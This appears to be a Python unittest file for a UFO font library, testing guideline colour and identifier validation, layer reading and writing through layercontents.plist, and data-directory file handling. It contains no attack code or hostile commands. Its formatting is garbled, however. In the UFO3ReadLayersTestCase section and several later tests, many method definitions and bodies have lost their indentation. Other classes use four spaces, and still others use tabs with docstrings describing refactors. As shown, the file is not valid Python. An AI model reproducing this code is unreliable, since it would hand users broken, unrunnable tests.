    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1, g, 1, 1")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1, 1, b, 1")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1, 1, 1, a")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## too many parts
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1, 0, 0, 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## < 0 in each position
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="-1, 0, 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="0, -1, 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="0, 0, -1, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="0, 0, 0, -1")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## > 1 in each position
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="2, 0, 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="0, 2, 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="0, 0, 2, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="0, 0, 0, 2")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # identifier
    ## duplicate
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, identifier="guide1"), dict(y=0, identifier="guide1")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## below min
    # identifiers must use characters in 0x20-0x7E; test a real 0x1F
    # control character (the old literal "\0x1F" was NUL + "x1F" and only
    # passed by accident because of the embedded NUL)
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, identifier="\x1f")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## above max
    # likewise a real 0x7F (DEL), one past the allowed maximum of 0x7E
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, identifier="\x7f")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
# ------
# layers
# ------
class UFO3ReadLayersTestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.ufoPath = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def makeUFO(self, metaInfo=None, layerContents=None):
    """Build a minimal UFO on disk at self.ufoPath.

    metaInfo defaults to a UFO 3 metainfo dict. layerContents defaults
    to a default layer plus two extra layers; pass a falsy value to
    omit layercontents.plist and get a single bare "glyphs" directory.
    Each layer directory receives a contents.plist and one glyph file.
    """
    self.clearUFO()
    if not os.path.exists(self.ufoPath):
        os.mkdir(self.ufoPath)
    # metainfo.plist
    if metaInfo is None:
        metaInfo = dict(creator="test", formatVersion=3)
    metaInfoPath = os.path.join(self.ufoPath, "metainfo.plist")
    with open(metaInfoPath, "wb") as f:
        writePlist(metaInfo, f)
    # layers
    if layerContents is None:
        layerContents = [
            ("public.default", "glyphs"),
            ("layer 1", "glyphs.layer 1"),
            ("layer 2", "glyphs.layer 2"),
        ]
    if layerContents:
        contentsPath = os.path.join(self.ufoPath, "layercontents.plist")
        with open(contentsPath, "wb") as f:
            writePlist(layerContents, f)
    else:
        # no layercontents.plist on disk; still create the default directory
        layerContents = [("", "glyphs")]
    # populate every layer directory with a single glyph
    for layerName, directory in layerContents:
        glyphsPath = os.path.join(self.ufoPath, directory)
        os.mkdir(glyphsPath)
        with open(os.path.join(glyphsPath, "contents.plist"), "wb") as f:
            writePlist(dict(a="a.glif"), f)
        with open(os.path.join(glyphsPath, "a.glif"), "w") as f:
            f.write(" ")
def clearUFO(self):
if os.path.exists(self.ufoPath):
shutil.rmtree(self.ufoPath)
# valid
def testValidRead(self):
    """Reading the glyph set succeeds for well-formed UFO 1, 2 and 3."""
    # UFO 1 and 2: no layercontents.plist, just a bare glyphs directory
    for version in (1, 2):
        self.makeUFO(
            metaInfo=dict(creator="test", formatVersion=version),
            layerContents=dict()
        )
        reader = UFOReader(self.ufoPath)
        reader.getGlyphSet()
    # UFO 3: full default layer set
    self.makeUFO()
    reader = UFOReader(self.ufoPath)
    reader.getGlyphSet()
# missing layer contents
def testMissingLayerContents(self):
    """A UFO 3 without layercontents.plist cannot provide a glyph set."""
    self.makeUFO()
    os.remove(os.path.join(self.ufoPath, "layercontents.plist"))
    reader = UFOReader(self.ufoPath)
    self.assertRaises(UFOLibError, reader.getGlyphSet)
# layer contents invalid format
def testInvalidLayerContentsFormat(self):
    """layercontents.plist must be a plist holding a list of pairs."""
    # bogus: not a plist at all
    self.makeUFO()
    contentsPath = os.path.join(self.ufoPath, "layercontents.plist")
    os.remove(contentsPath)
    with open(contentsPath, "w") as f:
        f.write("test")
    reader = UFOReader(self.ufoPath)
    self.assertRaises(UFOLibError, reader.getGlyphSet)
    # dict: a valid plist, but the wrong top-level type
    self.makeUFO()
    contentsPath = os.path.join(self.ufoPath, "layercontents.plist")
    os.remove(contentsPath)
    badContents = {
        "public.default" : "glyphs",
        "layer 1" : "glyphs.layer 1",
        "layer 2" : "glyphs.layer 2",
    }
    with open(contentsPath, "wb") as f:
        writePlist(badContents, f)
    reader = UFOReader(self.ufoPath)
    self.assertRaises(UFOLibError, reader.getGlyphSet)
# layer contents invalid name format
def testInvalidLayerContentsNameFormat(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
(1, "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# layer contents invalid directory format
def testInvalidLayerContentsDirectoryFormat(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", 1),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# directory listed in contents not on disk
def testLayerContentsHasMissingDirectory(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.doesnotexist"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# # directory on disk not listed in contents
# XXX should this raise an error?
#
# def testLayerContentsHasMissingDirectory(self):
# self.makeUFO()
# path = os.path.join(self.ufoPath, "layercontents.plist")
# os.remove(path)
# layerContents = [
# ("public.foregound", "glyphs"),
# ("layer 1", "glyphs.layer 2")
# ]
# with open(path, "wb") as f:
# writePlist(layerContents, f)
# reader = UFOReader(self.ufoPath)
# with self.assertRaises(UFOLibError):
# reader.getGlyphSet()
# no default layer on disk
def testMissingDefaultLayer(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# duplicate layer name
def testDuplicateLayerName(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 1", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# directory referenced by two layer names
def testDuplicateLayerDirectory(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 1")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# default without a name
def testDefaultLayerNoName(self):
# get the glyph set
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
reader.getGlyphSet()
# default with a name
def testDefaultLayerName(self):
# get the name
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("custom name", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
expected = layerContents[0][0]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getDefaultLayerName()
self.assertEqual(expected, result)
# get the glyph set
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("custom name", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
reader.getGlyphSet(expected)
# layer order
def testLayerOrder(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
expected = [name for (name, directory) in layerContents]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getLayerNames()
self.assertEqual(expected, result)
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("layer 1", "glyphs.layer 1"),
("public.foregound", "glyphs"),
("layer 2", "glyphs.layer 2")
]
expected = [name for (name, directory) in layerContents]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getLayerNames()
self.assertEqual(expected, result)
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("layer 2", "glyphs.layer 2"),
("layer 1", "glyphs.layer 1"),
("public.foregound", "glyphs")
]
expected = [name for (name, directory) in layerContents]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getLayerNames()
self.assertEqual(expected, result)
class UFO3WriteLayersTestCase(unittest.TestCase):

	"""Tests for creating, renaming and deleting layers with UFOWriter.

	Fixes over the previous version:
	* ``testRenameLayerDuplicateName`` and ``testRemoveDefaultLayer`` were
	  each defined twice; the second definition silently shadowed the first,
	  so the duplicate-name and remove-default tests never ran. The second
	  definitions are renamed ``testRenameLayerUnknownName`` and
	  ``testRemoveUnknownLayer``.
	* ``tempfile.mkdtemp`` replaces the deprecated, race-prone
	  ``tempfile.mktemp`` + ``os.mkdir`` pair.
	* The repeated layercontents rewriting and directory checks moved into
	  private helpers.
	"""

	def setUp(self):
		# mkdtemp creates the directory atomically; mktemp is deprecated.
		self.tempDir = tempfile.mkdtemp()
		self.ufoPath = os.path.join(self.tempDir, "test.ufo")

	def tearDown(self):
		shutil.rmtree(self.tempDir)

	def makeUFO(self, metaInfo=None, layerContents=None):
		"""Write a minimal UFO to self.ufoPath.

		metaInfo defaults to a UFO 3 metainfo.plist. layerContents defaults
		to three layers; pass an empty value to omit layercontents.plist
		(simulating UFO 1/2) and create only the "glyphs" directory.
		"""
		self.clearUFO()
		if not os.path.exists(self.ufoPath):
			os.mkdir(self.ufoPath)
		# metainfo.plist
		if metaInfo is None:
			metaInfo = dict(creator="test", formatVersion=3)
		path = os.path.join(self.ufoPath, "metainfo.plist")
		with open(path, "wb") as f:
			writePlist(metaInfo, f)
		# layercontents.plist
		if layerContents is None:
			layerContents = [
				("public.default", "glyphs"),
				("layer 1", "glyphs.layer 1"),
				("layer 2", "glyphs.layer 2"),
			]
		if layerContents:
			path = os.path.join(self.ufoPath, "layercontents.plist")
			with open(path, "wb") as f:
				writePlist(layerContents, f)
		else:
			# pre-UFO 3: a single, unnamed default layer
			layerContents = [("", "glyphs")]
		# one glyph ("a") per layer
		for name, directory in layerContents:
			glyphsPath = os.path.join(self.ufoPath, directory)
			os.mkdir(glyphsPath)
			contents = dict(a="a.glif")
			path = os.path.join(glyphsPath, "contents.plist")
			with open(path, "wb") as f:
				writePlist(contents, f)
			path = os.path.join(glyphsPath, "a.glif")
			with open(path, "w") as f:
				f.write(" ")

	def clearUFO(self):
		# Remove any UFO a previous makeUFO call left behind.
		if os.path.exists(self.ufoPath):
			shutil.rmtree(self.ufoPath)

	def _rewriteLayerContents(self, layerContents):
		# Replace the layercontents.plist written by makeUFO.
		path = os.path.join(self.ufoPath, "layercontents.plist")
		os.remove(path)
		with open(path, "wb") as f:
			writePlist(layerContents, f)

	def _readLayerContents(self):
		# Return the current on-disk layercontents.plist data.
		path = os.path.join(self.ufoPath, "layercontents.plist")
		with open(path, "rb") as f:
			return readPlist(f)

	def _assertDirectories(self, expectations):
		# expectations: (directory name, should it exist) pairs.
		for directory, expected in expectations:
			path = os.path.join(self.ufoPath, directory)
			self.assertEqual(expected, os.path.exists(path))

	# __init__: missing layer contents
	def testMissingLayerContents(self):
		self.makeUFO()
		os.remove(os.path.join(self.ufoPath, "layercontents.plist"))
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: layer contents invalid format
	def testInvalidLayerContentsFormat(self):
		# not a plist at all
		self.makeUFO()
		path = os.path.join(self.ufoPath, "layercontents.plist")
		os.remove(path)
		with open(path, "w") as f:
			f.write("test")
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
		# a dict instead of a list of pairs
		self.makeUFO()
		self._rewriteLayerContents({
			"public.default" : "glyphs",
			"layer 1" : "glyphs.layer 1",
			"layer 2" : "glyphs.layer 2",
		})
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: layer contents invalid name format
	def testInvalidLayerContentsNameFormat(self):
		self.makeUFO()
		self._rewriteLayerContents([
			(1, "glyphs"),
			("layer 1", "glyphs.layer 1"),
			("layer 2", "glyphs.layer 2")
		])
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: layer contents invalid directory format
	def testInvalidLayerContentsDirectoryFormat(self):
		self.makeUFO()
		self._rewriteLayerContents([
			("public.foregound", "glyphs"),
			("layer 1", 1),
			("layer 2", "glyphs.layer 2")
		])
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: directory listed in contents not on disk
	def testLayerContentsHasMissingDirectory(self):
		self.makeUFO()
		self._rewriteLayerContents([
			("public.foregound", "glyphs"),
			("layer 1", "glyphs.doesnotexist"),
			("layer 2", "glyphs.layer 2")
		])
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: no default layer on disk
	def testMissingDefaultLayer(self):
		self.makeUFO()
		self._rewriteLayerContents([
			("layer 1", "glyphs.layer 1"),
			("layer 2", "glyphs.layer 2")
		])
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: duplicate layer name
	def testDuplicateLayerName(self):
		self.makeUFO()
		self._rewriteLayerContents([
			("public.foregound", "glyphs"),
			("layer 1", "glyphs.layer 1"),
			("layer 1", "glyphs.layer 2")
		])
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: directory referenced by two layer names
	def testDuplicateLayerDirectory(self):
		self.makeUFO()
		self._rewriteLayerContents([
			("public.foregound", "glyphs"),
			("layer 1", "glyphs.layer 1"),
			("layer 2", "glyphs.layer 1")
		])
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)

	# __init__: default without a name
	def testDefaultLayerNoName(self):
		self.makeUFO()
		self._rewriteLayerContents([
			("public.foregound", "glyphs"),
			("layer 1", "glyphs.layer 1"),
			("layer 2", "glyphs.layer 2")
		])
		writer = UFOWriter(self.ufoPath)

	# __init__: default with a name
	def testDefaultLayerName(self):
		self.makeUFO()
		self._rewriteLayerContents([
			("custom name", "glyphs"),
			("layer 1", "glyphs.layer 1"),
			("layer 2", "glyphs.layer 2")
		])
		writer = UFOWriter(self.ufoPath)

	def _assertUpConvert(self, fromVersion):
		# Opening an older UFO and writing layer contents must produce a
		# UFO 3 style layercontents.plist.
		self.makeUFO(
			metaInfo=dict(creator="test", formatVersion=fromVersion),
			layerContents=dict()
		)
		writer = UFOWriter(self.ufoPath)
		writer.writeLayerContents(["public.default"])
		expected = [["public.default", "glyphs"]]
		self.assertEqual(expected, self._readLayerContents())

	# __init__: up convert 1 > 3
	def testUpConvert1To3(self):
		self._assertUpConvert(1)

	# __init__: up convert 2 > 3
	def testUpConvert2To3(self):
		self._assertUpConvert(2)

	# __init__: down convert 3 > 1
	def testDownConvert3To1(self):
		self.makeUFO()
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath, formatVersion=1)

	# __init__: down convert 3 > 2
	def testDownConvert3To2(self):
		self.makeUFO()
		self.assertRaises(UFOLibError, UFOWriter, self.ufoPath, formatVersion=2)

	# get glyph sets
	def testGetGlyphSets(self):
		self.makeUFO()
		# give each layer a distinct glyph name so the sets can be told apart
		path = os.path.join(self.ufoPath, "glyphs.layer 1", "contents.plist")
		with open(path, "wb") as f:
			writePlist(dict(b="a.glif"), f)
		path = os.path.join(self.ufoPath, "glyphs.layer 2", "contents.plist")
		with open(path, "wb") as f:
			writePlist(dict(c="a.glif"), f)
		# now test
		writer = UFOWriter(self.ufoPath)
		self.assertEqual(["a"], list(writer.getGlyphSet().keys()))
		self.assertEqual(["b"], list(writer.getGlyphSet("layer 1", defaultLayer=False).keys()))
		self.assertEqual(["c"], list(writer.getGlyphSet("layer 2", defaultLayer=False).keys()))

	# make a new font with one layer
	def testNewFontOneLayer(self):
		self.clearUFO()
		writer = UFOWriter(self.ufoPath)
		writer.getGlyphSet()
		writer.writeLayerContents(["public.default"])
		self._assertDirectories([("glyphs", True)])
		expected = [["public.default", "glyphs"]]
		self.assertEqual(expected, self._readLayerContents())

	# make a new font with three layers
	def testNewFontThreeLayers(self):
		self.clearUFO()
		writer = UFOWriter(self.ufoPath)
		writer.getGlyphSet("layer 1", defaultLayer=False)
		writer.getGlyphSet()
		writer.getGlyphSet("layer 2", defaultLayer=False)
		writer.writeLayerContents(["layer 1", "public.default", "layer 2"])
		self._assertDirectories([
			("glyphs", True),
			("glyphs.layer 1", True),
			("glyphs.layer 2", True),
		])
		expected = [["layer 1", "glyphs.layer 1"], ["public.default", "glyphs"], ["layer 2", "glyphs.layer 2"]]
		self.assertEqual(expected, self._readLayerContents())

	# add a layer to an existing font
	def testAddLayerToExistingFont(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		writer.getGlyphSet("layer 3", defaultLayer=False)
		writer.writeLayerContents(["public.default", "layer 1", "layer 2", "layer 3"])
		self._assertDirectories([
			("glyphs", True),
			("glyphs.layer 1", True),
			("glyphs.layer 2", True),
			("glyphs.layer 3", True),
		])
		expected = [['public.default', 'glyphs'], ['layer 1', 'glyphs.layer 1'], ['layer 2', 'glyphs.layer 2'], ["layer 3", "glyphs.layer 3"]]
		self.assertEqual(expected, self._readLayerContents())

	# rename with a valid name
	def testRenameLayer(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		writer.renameGlyphSet("layer 1", "layer 3")
		writer.writeLayerContents(["public.default", "layer 3", "layer 2"])
		self._assertDirectories([
			("glyphs", True),
			("glyphs.layer 1", False),
			("glyphs.layer 2", True),
			("glyphs.layer 3", True),
		])
		expected = [['public.default', 'glyphs'], ['layer 3', 'glyphs.layer 3'], ['layer 2', 'glyphs.layer 2']]
		self.assertEqual(expected, self._readLayerContents())

	# rename the default layer and promote another layer to default
	def testRenameLayerDefault(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		writer.renameGlyphSet("public.default", "layer xxx")
		writer.renameGlyphSet("layer 1", "layer 1", defaultLayer=True)
		writer.writeLayerContents(["layer xxx", "layer 1", "layer 2"])
		self._assertDirectories([
			("glyphs", True),
			("glyphs.layer 1", False),
			("glyphs.layer 2", True),
			("glyphs.layer xxx", True),
		])
		expected = [['layer xxx', 'glyphs.layer xxx'], ['layer 1', 'glyphs'], ['layer 2', 'glyphs.layer 2']]
		self.assertEqual(expected, self._readLayerContents())

	# rename to a duplicate name
	def testRenameLayerDuplicateName(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		self.assertRaises(UFOLibError, writer.renameGlyphSet, "layer 1", "layer 2")

	# rename an unknown layer
	# (previously a second definition of testRenameLayerDuplicateName,
	# which shadowed the test above so it never ran)
	def testRenameLayerUnknownName(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		self.assertRaises(UFOLibError, writer.renameGlyphSet, "does not exist", "layer 2")

	# remove a valid layer
	def testRemoveLayer(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		writer.deleteGlyphSet("layer 1")
		writer.writeLayerContents(["public.default", "layer 2"])
		self._assertDirectories([
			("glyphs", True),
			("glyphs.layer 1", False),
			("glyphs.layer 2", True),
		])
		expected = [["public.default", "glyphs"], ["layer 2", "glyphs.layer 2"]]
		self.assertEqual(expected, self._readLayerContents())

	# remove the default layer
	def testRemoveDefaultLayer(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		writer.deleteGlyphSet("public.default")
		self._assertDirectories([
			("glyphs", False),
			("glyphs.layer 1", True),
			("glyphs.layer 2", True),
		])
		expected = [["layer 1", "glyphs.layer 1"], ["layer 2", "glyphs.layer 2"]]
		self.assertEqual(expected, self._readLayerContents())

	# remove an unknown layer
	# (previously a second definition of testRemoveDefaultLayer, which
	# shadowed the test above so it never ran)
	def testRemoveUnknownLayer(self):
		self.makeUFO()
		writer = UFOWriter(self.ufoPath)
		self.assertRaises(UFOLibError, writer.deleteGlyphSet, "does not exist")
# -----
# /data
# -----
class UFO3ReadDataTestCase(unittest.TestCase):

	"""Tests for reading files from the data directory of a UFO 3 package."""

	def getFontPath(self):
		# The test font ships in the "testdata" directory next to this file.
		testdata = os.path.join(os.path.dirname(__file__), "testdata")
		return os.path.join(testdata, "UFO3-Read Data.ufo")

	def testUFOReaderDataDirectoryListing(self):
		# The listing covers every file below data/, using native separators.
		reader = UFOReader(self.getFontPath())
		found = reader.getDataDirectoryListing()
		expected = [
			'org.unifiedfontobject.directory%(s)sbar%(s)slol.txt' % {'s': os.sep},
			'org.unifiedfontobject.directory%(s)sfoo.txt' % {'s': os.sep},
			'org.unifiedfontobject.file.txt'
		]
		self.assertEqual(set(found), set(expected))

	def testUFOReaderBytesFromPath(self):
		# Existing files return their bytes; missing files return None.
		reader = UFOReader(self.getFontPath())
		cases = [
			("data/org.unifiedfontobject.file.txt", b"file.txt"),
			("data/org.unifiedfontobject.directory/bar/lol.txt", b"lol.txt"),
			("data/org.unifiedfontobject.doesNotExist", None),
		]
		for path, expected in cases:
			found = reader.readBytesFromPath(path)
			self.assertEqual(found, expected)

	def testUFOReaderReadFileFromPath(self):
		# Existing files yield a readable file object; missing files yield None.
		reader = UFOReader(self.getFontPath())
		fileObject = reader.getReadFileForPath("data/org.unifiedfontobject.file.txt")
		self.assertNotEqual(fileObject, None)
		self.assertEqual(hasattr(fileObject, "read"), True)
		fileObject.close()
		missing = reader.getReadFileForPath("data/org.unifiedfontobject.doesNotExist")
		self.assertEqual(missing, None)
class UFO3WriteDataTestCase(unittest.TestCase):

	"""Tests for writing arbitrary files under data/ with UFOWriter.

	Improvements: ``tempfile.mkdtemp`` replaces the deprecated, race-prone
	``tempfile.mktemp`` + ``os.mkdir`` pair, and the triplicated
	write-then-verify sequence in testUFOWriterWriteBytesToPath moved into
	a private helper.
	"""

	def setUp(self):
		# mkdtemp creates the directory atomically; mktemp is deprecated.
		self.tempDir = tempfile.mkdtemp()
		self.dstDir = os.path.join(self.tempDir, "test.ufo")

	def tearDown(self):
		shutil.rmtree(self.tempDir)

	def tearDownUFO(self):
		# Remove just the UFO so one test method can build several in a row.
		if os.path.exists(self.dstDir):
			shutil.rmtree(self.dstDir)

	def _writeBytesAndCheck(self, path, payload):
		# Write payload through a fresh writer, verify it landed on disk
		# byte for byte, then clean up.
		writer = UFOWriter(self.dstDir, formatVersion=3)
		writer.writeBytesToPath(path, payload)
		fullPath = os.path.join(self.dstDir, path)
		self.assertEqual(os.path.exists(fullPath), True)
		with open(fullPath, "rb") as f:
			written = f.read()
		self.assertEqual(payload, written)
		self.tearDownUFO()

	def testUFOWriterWriteBytesToPath(self):
		# basic file
		self._writeBytesAndCheck(
			"data/org.unifiedfontobject.writebytesbasicfile.txt",
			b"test")
		# basic file with non-ASCII bytes
		self._writeBytesAndCheck(
			"data/org.unifiedfontobject.writebytesbasicunicodefile.txt",
			b"t\xeb\xdft")
		# intermediate directories are created on demand
		self._writeBytesAndCheck(
			"data/org.unifiedfontobject.writebytesdirectory/level1/level2/file.txt",
			b"test")

	def testUFOWriterWriteFileToPath(self):
		# getFileObjectForPath returns an open file-like object
		path = "data/org.unifiedfontobject.getwritefile.txt"
		writer = UFOWriter(self.dstDir, formatVersion=3)
		fileObject = writer.getFileObjectForPath(path)
		self.assertNotEqual(fileObject, None)
		self.assertEqual(hasattr(fileObject, "read"), True)
		fileObject.close()
		self.tearDownUFO()

	def testUFOWriterRemoveFile(self):
		# removeFileForPath deletes the file and prunes directories that
		# become empty; reserved or missing paths raise UFOLibError.
		path1 = "data/org.unifiedfontobject.removefile/level1/level2/file1.txt"
		path2 = "data/org.unifiedfontobject.removefile/level1/level2/file2.txt"
		path3 = "data/org.unifiedfontobject.removefile/level1/file3.txt"
		writer = UFOWriter(self.dstDir, formatVersion=3)
		writer.writeBytesToPath(path1, b"test")
		writer.writeBytesToPath(path2, b"test")
		writer.writeBytesToPath(path3, b"test")
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path1)), True)
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path2)), True)
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), True)
		writer.removeFileForPath(path1)
		# file1 gone, but level2 still holds file2
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path1)), False)
		self.assertEqual(os.path.exists(os.path.dirname(os.path.join(self.dstDir, path1))), True)
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path2)), True)
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), True)
		writer.removeFileForPath(path2)
		# level2 is now empty and should be pruned
		self.assertEqual(os.path.exists(os.path.dirname(os.path.join(self.dstDir, path1))), False)
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path2)), False)
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), True)
		writer.removeFileForPath(path3)
		# the whole removefile tree should be gone
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), False)
		self.assertEqual(os.path.exists(os.path.dirname(os.path.join(self.dstDir, path2))), False)
		self.assertEqual(os.path.exists(os.path.join(self.dstDir, "data/org.unifiedfontobject.removefile")), False)
		# reserved and missing paths raise
		self.assertRaises(UFOLibError, writer.removeFileForPath, path="metainfo.plist")
		self.assertRaises(UFOLibError, writer.removeFileForPath, path="data/org.unifiedfontobject.doesNotExist.txt")
		self.tearDownUFO()

	def testUFOWriterCopy(self):
		# copyFromReader can copy a single file or a whole directory tree.
		sourceDir = self.dstDir.replace(".ufo", "") + "-copy source" + ".ufo"
		dataPath = "data/org.unifiedfontobject.copy/level1/level2/file1.txt"
		writer = UFOWriter(sourceDir, formatVersion=3)
		writer.writeBytesToPath(dataPath, b"test")
		# copy a file
		reader = UFOReader(sourceDir)
